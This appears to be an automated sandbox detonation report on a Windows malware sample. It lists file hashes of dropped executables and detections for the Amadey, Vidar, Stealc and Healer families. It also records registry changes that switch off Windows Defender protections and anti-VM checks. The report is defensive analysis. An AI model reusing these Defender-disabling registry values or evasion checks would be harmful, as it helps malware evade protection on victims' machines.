| SHA256 | ce40f79585195148ac86928d18da80b963cc98d6feb83c1c2e75e8b6d6ef39f8 |
| SHA512 | 105fb01521fca054766d1d1e46cf3bf177b8bab44800f7bbad9a84f388af32e745474b3cc4f70c1fd779b4e7bcf0912502860092e1824f7ba4b52c612ba5a70b |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | c3cab17ab48f8809df218acc0ade40c7 |
| SHA1 | bea265716841ab083d20c437c03da3ff0eec00c5 |
| SHA256 | a3e54d843937797b2fbd26e15de8230cdbc56fa2e1b1d172a7a86851aed5cac9 |
| SHA512 | e4ed4177cfd9f3bf15ccab895fc4d9e81b0e283c77e2a30fc86c5184fd4d5a0ae903783a464ba0341bdce814aad5a3868167542337705fdbb78e8e4ae41ec262 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js
| MD5 | 4953a89ce8cbb66ee988c96c67d81715 |
| SHA1 | 6515b00939e294f22782a5fbb6986964319025c8 |
| SHA256 | 6405cf0055af4b501e8ed7cb3081377f7f0afb7a0bc698bbd333616012622beb |
| SHA512 | 8d1cc1efd81e3ada365ea87b847f3324d12332012569903b1173910047e0944647d76baad0cbd95d3eca9068b9d048629803313db721c94ca173533ce429e563 |
memory/2384-597-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe
| MD5 | 37259000abc86b85dbb65366443ec3c1 |
| SHA1 | b6cf0ac13b56918992c9c6daa38e791a40f60f88 |
| SHA256 | 681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c |
| SHA512 | 866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695 |
memory/3264-611-0x0000000000A90000-0x0000000000EDE000-memory.dmp
memory/3264-610-0x0000000000A90000-0x0000000000EDE000-memory.dmp
memory/2728-649-0x0000000000B70000-0x000000000102C000-memory.dmp
memory/2384-656-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 5cd1beef6b9c8ce2a5ee1e02606dae4e |
| SHA1 | 0083140d4defd415e2d1e4dd5a0c3b549ce6c400 |
| SHA256 | 9d6a090c3dc1c8eb05c27d703c3d54d39509984c68b8da72cd1bc5c6d2e9e3b4 |
| SHA512 | 50f1104266ccaeba2b692f7200a5e48c36d1f7660b9c2e8c31c9ada46859a34c31d7106502a2ddaea684075f77c1cb7d21657127c040c6f3fdb79d37b482a04c |
memory/2728-666-0x0000000000B70000-0x000000000102C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe
| MD5 | dab2bc3868e73dd0aab2a5b4853d9583 |
| SHA1 | 3dadfc676570fc26fc2406d948f7a6d4834a6e2c |
| SHA256 | 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb |
| SHA512 | 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8 |
memory/2384-679-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js
| MD5 | f2dc130a148910bf9103aa63524d23fe |
| SHA1 | 91245401f4245f796659165d8814c2557e09a6cc |
| SHA256 | f8d57782a79728f287f8ef77f7042ed6f182f3ec5485298176acd8716aa1bcfb |
| SHA512 | 10abb5d662c902ff6d357d67a1f18ae531652e05d9eb73b762d1aa9eae3309e7eecb0649685bbbaa8224a506eed276e3e56d0800bee3bc80b53e9d57fb3278e4 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | a01c5ecd6108350ae23d2cddf0e77c17 |
| SHA1 | c6ac28a2cd979f1f9a75d56271821d5ff665e2b6 |
| SHA256 | 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42 |
| SHA512 | b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
| MD5 | 8be33af717bb1b67fbd61c3f4b807e9e |
| SHA1 | 7cf17656d174d951957ff36810e874a134dd49e0 |
| SHA256 | e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd |
| SHA512 | 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
| MD5 | 937326fead5fd401f6cca9118bd9ade9 |
| SHA1 | 4526a57d4ae14ed29b37632c72aef3c408189d91 |
| SHA256 | 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81 |
| SHA512 | b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
| MD5 | 688bed3676d2104e7f17ae1cd2c59404 |
| SHA1 | 952b2cdf783ac72fcb98338723e9afd38d47ad8e |
| SHA256 | 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237 |
| SHA512 | 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
| MD5 | 33bf7b0439480effb9fb212efce87b13 |
| SHA1 | cee50f2745edc6dc291887b6075ca64d716f495a |
| SHA256 | 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e |
| SHA512 | d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275 |
C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe
| MD5 | f155a51c9042254e5e3d7734cd1c3ab0 |
| SHA1 | 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf |
| SHA256 | 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af |
| SHA512 | 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js
| MD5 | 9e9504c75fa9b52b78f45c4d6f889e41 |
| SHA1 | f1e4fbb8a4e9c55be920b336c8293ca9c69fc9d4 |
| SHA256 | 6128b076e58a745aed2e2c3f22c6c2f48bb0bedbdd7d857d58d8ab38484a084d |
| SHA512 | 6c891da218a30cf0bbfb6977afb472ee879e5395eefdf80bd0372b732ba0db5f6f679c45d82dce1fb2f3ea24710420a6a207b174d54934fcab7b2dc6b88951d1 |
memory/2728-775-0x0000000000B70000-0x000000000102C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/3512-789-0x0000000000980000-0x00000000009E0000-memory.dmp
memory/2384-790-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3992-792-0x0000000000400000-0x0000000000429000-memory.dmp
C:\ProgramData\1D771913E5AD471F.dat
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
| SHA1 | 9ae72545a0b6004cdab34f56031dc1c8aa146cc9 |
| SHA256 | df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2 |
| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/4932-848-0x0000000000230000-0x0000000000242000-memory.dmp
memory/4932-849-0x0000000000150000-0x0000000000160000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-06 02:01
Reported
2025-03-06 02:04
Platform
win10v2004-20250217-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
Stealc
Stealc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
